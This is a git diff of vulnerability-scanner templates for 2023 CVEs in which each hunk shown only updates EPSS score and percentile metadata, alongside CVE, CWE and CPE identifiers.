a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index dcdc72b26d2..72125391544 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-34659 cwe-id: CWE-89 epss-score: 0.91195 - epss-percentile: 0.9963 + epss-percentile: 0.99628 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 4edc97d7f5b..22f4bcb115e 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-34752 cwe-id: CWE-89 epss-score: 0.30198 - epss-percentile: 0.96533 + epss-percentile: 0.96535 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34754.yaml b/http/cves/2023/CVE-2023-34754.yaml index 731cc1be9c2..255a86427ed 100644 --- a/http/cves/2023/CVE-2023-34754.yaml +++ b/http/cves/2023/CVE-2023-34754.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-34754 cwe-id: CWE-89 epss-score: 0.10342 - epss-percentile: 0.92973 + epss-percentile: 0.92965 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index b6be98d31cf..1d6ac5df521 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-3479 cwe-id: CWE-79 epss-score: 0.26384 - epss-percentile: 0.96156 + epss-percentile: 0.96159 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 04787562ced..41f7b99336c 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-34843 cwe-id: CWE-22 epss-score: 0.91885 - epss-percentile: 0.99675 + epss-percentile: 0.99674 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index abdd1666b55..19547a63371 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.94089 - epss-percentile: 0.99901 + epss-percentile: 0.99899 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34990.yaml b/http/cves/2023/CVE-2023-34990.yaml index fdf808e7fc3..b91525f9015 100644 --- a/http/cves/2023/CVE-2023-34990.yaml +++ b/http/cves/2023/CVE-2023-34990.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-34990 cwe-id: CWE-94,CWE-23 epss-score: 0.29185 - epss-percentile: 0.96439 + epss-percentile: 0.96443 metadata: max-request: 1 shodan-query: title:"FortiWLM Login" diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index a37fa4a9d05..e63226912a6 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2023-34993 cwe-id: CWE-78 epss-score: 0.86419 - epss-percentile: 0.99384 + epss-percentile: 0.99386 cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index c2111fadef6..f96677d072a 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-35082 cwe-id: CWE-287 epss-score: 0.94423 - epss-percentile: 0.9998 + epss-percentile: 0.99979 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35156.yaml b/http/cves/2023/CVE-2023-35156.yaml index 20a48182b24..10d2767538a 100644 --- a/http/cves/2023/CVE-2023-35156.yaml +++ b/http/cves/2023/CVE-2023-35156.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-35156 cwe-id: CWE-79 epss-score: 0.09278 - epss-percentile: 0.92493 + epss-percentile: 0.92488 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 4c3cb3aaec0..127bc8f287f 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-35158 cwe-id: CWE-87 epss-score: 0.07644 - epss-percentile: 0.91619 + epss-percentile: 0.91617 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35160.yaml b/http/cves/2023/CVE-2023-35160.yaml index 98294bd768b..d5a89bc7ed8 100644 --- a/http/cves/2023/CVE-2023-35160.yaml +++ b/http/cves/2023/CVE-2023-35160.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-35160 cwe-id: CWE-79 epss-score: 0.12078 - epss-percentile: 0.93585 + epss-percentile: 0.9358 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml index 75063ce2997..d32dcebb6ea 100644 --- a/http/cves/2023/CVE-2023-35161.yaml +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-35161 cwe-id: CWE-79 epss-score: 0.12078 - epss-percentile: 0.93585 + epss-percentile: 0.9358 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml index 1563967e452..1b8aaaa76fc 100644 --- a/http/cves/2023/CVE-2023-35162.yaml +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-35162 cwe-id: CWE-79 epss-score: 0.12078 - epss-percentile: 0.93585 + epss-percentile: 0.9358 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-3519.yaml b/http/cves/2023/CVE-2023-3519.yaml index d70feee12e1..fb333406dfb 100644 --- a/http/cves/2023/CVE-2023-3519.yaml +++ b/http/cves/2023/CVE-2023-3519.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3519 cwe-id: CWE-94 - epss-score: 0.93899 - epss-percentile: 0.99866 + epss-score: 0.93825 + epss-percentile: 0.99855 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: vendor: citrix diff --git a/http/cves/2023/CVE-2023-3521.yaml b/http/cves/2023/CVE-2023-3521.yaml index ed127307a0b..71d13ad4e1b 100644 --- a/http/cves/2023/CVE-2023-3521.yaml +++ b/http/cves/2023/CVE-2023-3521.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3521 cwe-id: CWE-79 epss-score: 0.15059 - epss-percentile: 0.94365 + epss-percentile: 0.94362 metadata: verified: true max-request: 1 diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index bd6d5c1faa1..0359713d52d 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-35843 cwe-id: CWE-22 epss-score: 0.91956 - epss-percentile: 0.9968 + epss-percentile: 0.99679 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index a47d9ef4939..b969ea1fe89 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-36144 cwe-id: CWE-862 epss-score: 0.86394 - epss-percentile: 0.99382 + epss-percentile: 0.99385 cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 35b9e23290c..946e82432fc 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-36284 cwe-id: CWE-89 epss-score: 0.24278 - epss-percentile: 0.95913 + epss-percentile: 0.95917 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 27e1a7639ae..2e1ff534f10 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-36287 cwe-id: CWE-79 epss-score: 0.20464 - epss-percentile: 0.95363 + epss-percentile: 0.95364 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index f9710fb966c..72f2d275944 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-36289 cwe-id: CWE-79 epss-score: 0.23724 - epss-percentile: 0.95821 + epss-percentile: 0.95824 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index c690ca11e8d..2da02e5626f 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-36306 cwe-id: CWE-79 epss-score: 0.06137 - epss-percentile: 0.9052 + epss-percentile: 0.90522 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 7779a647c56..11303bcefc0 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-36346 cwe-id: CWE-79 epss-score: 0.09444 - epss-percentile: 0.9257 + epss-percentile: 0.92563 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 32fd1a416ed..689b62661e6 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-3710 cwe-id: CWE-77,CWE-20 epss-score: 0.91703 - epss-percentile: 0.99665 + epss-percentile: 0.99663 cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3722.yaml b/http/cves/2023/CVE-2023-3722.yaml index 337660d7fae..228c83ab71d 100644 --- a/http/cves/2023/CVE-2023-3722.yaml +++ b/http/cves/2023/CVE-2023-3722.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3722 cwe-id: CWE-434 epss-score: 0.50868 - epss-percentile: 0.97769 + epss-percentile: 0.97764 cpe: cpe:2.3:a:avaya:aura_device_services:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index bb7592c3674..553a6b78bbb 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-37265 cwe-id: CWE-306 epss-score: 0.91121 - epss-percentile: 0.99626 + epss-percentile: 0.99624 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index ec6be90671e..5894287f51e 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-37270 cwe-id: CWE-89 epss-score: 0.59212 - epss-percentile: 0.9816 + epss-percentile: 0.98162 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 493ba03d4e0..e18968592ff 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-37474 cwe-id: CWE-22 epss-score: 0.89933 - epss-percentile: 0.99555 + epss-percentile: 0.99554 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37599.yaml b/http/cves/2023/CVE-2023-37599.yaml index 3800ac5d96f..bc6d4cddcf0 100644 --- a/http/cves/2023/CVE-2023-37599.yaml +++ b/http/cves/2023/CVE-2023-37599.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-37599 cwe-id: CWE-668 epss-score: 0.89795 - epss-percentile: 0.99545 + epss-percentile: 0.99546 cpe: cpe:2.3:a:issabel:issabel-pbx:4.0.0-6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37645.yaml b/http/cves/2023/CVE-2023-37645.yaml index fb68ba6b2ec..f01cc8b078e 100644 --- a/http/cves/2023/CVE-2023-37645.yaml +++ b/http/cves/2023/CVE-2023-37645.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-37645 cwe-id: CWE-668 epss-score: 0.47838 - epss-percentile: 0.97617 + epss-percentile: 0.97611 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index fff4180d7e9..64f3cbe10d1 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-37728 cwe-id: CWE-79 epss-score: 0.11915 - epss-percentile: 0.93537 + epss-percentile: 0.93531 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 5ab1f5ae543..d796d896d18 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-37979 cwe-id: CWE-79 epss-score: 0.45008 - epss-percentile: 0.97479 + epss-percentile: 0.97475 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37988.yaml b/http/cves/2023/CVE-2023-37988.yaml index f586de7835f..f58ed949dfa 100644 --- a/http/cves/2023/CVE-2023-37988.yaml +++ b/http/cves/2023/CVE-2023-37988.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37988 epss-score: 0.17558 - epss-percentile: 0.94874 + epss-percentile: 0.94873 cwe-id: CWE-79 cpe: cpe:2.3:a:creative-solutions:contact_form_generator:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 537ac84b335..e396f68b3f7 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-38035 cwe-id: CWE-863 epss-score: 0.94438 - epss-percentile: 0.99987 + epss-percentile: 0.99986 cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38192.yaml b/http/cves/2023/CVE-2023-38192.yaml index 8584277eb69..c8d6ca1a844 100644 --- a/http/cves/2023/CVE-2023-38192.yaml +++ b/http/cves/2023/CVE-2023-38192.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-38192 cwe-id: CWE-79 epss-score: 0.06209 - epss-percentile: 0.90577 + epss-percentile: 0.90578 cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.00.0.01710:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38194.yaml b/http/cves/2023/CVE-2023-38194.yaml index 3239548509c..10b267cc518 100644 --- a/http/cves/2023/CVE-2023-38194.yaml +++ b/http/cves/2023/CVE-2023-38194.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-38194 cwe-id: CWE-79 epss-score: 0.04349 - epss-percentile: 0.88599 + epss-percentile: 0.88598 cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.00.0.01710:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 18d4d29711a..eb10ae0a15d 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-3836 cwe-id: CWE-434 epss-score: 0.90929 - epss-percentile: 0.99614 + epss-percentile: 0.99612 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index dbe38fc49a3..2f9f6d9bcf7 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-3843 cwe-id: CWE-79 epss-score: 0.08663 - epss-percentile: 0.92196 + epss-percentile: 0.9219 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 576ee728463..d33508ae0db 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-38433 cwe-id: CWE-798 epss-score: 0.53203 - epss-percentile: 0.97877 + epss-percentile: 0.97873 cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index 5edd2495282..d7b47a1b5d8 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-3844 cwe-id: CWE-79 epss-score: 0.08663 - epss-percentile: 0.92196 + epss-percentile: 0.9219 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index 60b028ef6bb..c41d103415a 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-3845 cwe-id: CWE-79 epss-score: 0.08663 - epss-percentile: 0.92196 + epss-percentile: 0.9219 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml index ad6862bd748..979c17a3340 100644 --- a/http/cves/2023/CVE-2023-3846.yaml +++ b/http/cves/2023/CVE-2023-3846.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-3846 cwe-id: CWE-79 epss-score: 0.08663 - epss-percentile: 0.92196 + epss-percentile: 0.9219 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 73c35d67e2d..1ec4fbca871 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-3847 cwe-id: CWE-79 epss-score: 0.1132 - epss-percentile: 0.93327 + epss-percentile: 0.9332 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index 69b17713c9b..50018e02a1a 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-3848 cwe-id: CWE-79 epss-score: 0.08663 - epss-percentile: 0.92196 + epss-percentile: 0.9219 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index c51436f3306..57befa236af 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-3849 cwe-id: CWE-79 epss-score: 0.08663 - epss-percentile: 0.92196 + epss-percentile: 0.9219 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index a31d8fd8f7f..af3c12613e4 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-38501 cwe-id: CWE-79 epss-score: 0.81105 - epss-percentile: 0.99118 + epss-percentile: 0.9912 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38879.yaml b/http/cves/2023/CVE-2023-38879.yaml index b0d36384b5b..3c76851f46b 100644 --- a/http/cves/2023/CVE-2023-38879.yaml +++ b/http/cves/2023/CVE-2023-38879.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-38879 cwe-id: CWE-22 epss-score: 0.11974 - epss-percentile: 0.93553 + epss-percentile: 0.93547 cpe: cpe:2.3:a:os4ed:opensis:9.0:*:*:*:community:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38952.yaml b/http/cves/2023/CVE-2023-38952.yaml index af77bf2dde0..0ade2749c1a 100644 --- a/http/cves/2023/CVE-2023-38952.yaml +++ b/http/cves/2023/CVE-2023-38952.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.3 cve-id: CVE-2023-38952 - epss-score: 0.21436 - epss-percentile: 0.95527 + epss-score: 0.16963 + epss-percentile: 0.94759 cwe-id: CWE-552 cpe: cpe:2.3:a:zkteco:biotime:8.5.5:::::::* metadata: diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index b001e3aae96..8345c29b6bb 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-38964 cwe-id: CWE-79 epss-score: 0.04722 - epss-percentile: 0.8907 + epss-percentile: 0.89067 cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38992.yaml b/http/cves/2023/CVE-2023-38992.yaml index c8172705ddc..0a83ffde449 100644 --- a/http/cves/2023/CVE-2023-38992.yaml +++ b/http/cves/2023/CVE-2023-38992.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-38992 cwe-id: CWE-89 epss-score: 0.66947 - epss-percentile: 0.98492 + epss-percentile: 0.98495 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.1:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 263d27048e3..0ef8bc6b1d4 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-39002 cwe-id: CWE-79 epss-score: 0.23578 - epss-percentile: 0.95803 + epss-percentile: 0.95807 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-39007.yaml b/http/cves/2023/CVE-2023-39007.yaml index e3c0818a507..0e63797738c 100644 --- a/http/cves/2023/CVE-2023-39007.yaml +++ b/http/cves/2023/CVE-2023-39007.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-39007 cwe-id: CWE-79 epss-score: 0.41893 - epss-percentile: 0.97311 + epss-percentile: 0.97308 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 8a76f08e40a..c88f70a5e3f 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-39108 cwe-id: CWE-918 epss-score: 0.74826 - epss-percentile: 0.98819 + epss-percentile: 0.98818 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 2527af00258..3c331ecc918 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-39109 cwe-id: CWE-918 epss-score: 0.74826 - epss-percentile: 0.98819 + epss-percentile: 0.98818 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39121.yaml b/http/cves/2023/CVE-2023-39121.yaml index 1db883ed5a7..4fe45857bc0 100644 --- a/http/cves/2023/CVE-2023-39121.yaml +++ b/http/cves/2023/CVE-2023-39121.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-39121 cwe-id: CWE-89 epss-score: 0.01735 - epss-percentile: 0.82025 + epss-percentile: 0.82023 cpe: cpe:2.3:a:emlog:emlog:2.1.9:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 910244b1201..dd9b9238fb2 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3936 cwe-id: CWE-79 epss-score: 0.09688 - epss-percentile: 0.9268 + epss-percentile: 0.92674 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39560.yaml b/http/cves/2023/CVE-2023-39560.yaml index 64ae6f856f4..a40e7f14933 100644 --- a/http/cves/2023/CVE-2023-39560.yaml +++ b/http/cves/2023/CVE-2023-39560.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-39560 cwe-id: CWE-89 epss-score: 0.60798 - epss-percentile: 0.98228 + epss-percentile: 0.98226 cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index e27b42e0935..b6917c1d179 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-39598 cwe-id: CWE-79 epss-score: 0.56383 - epss-percentile: 0.98032 + epss-percentile: 0.9803 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git 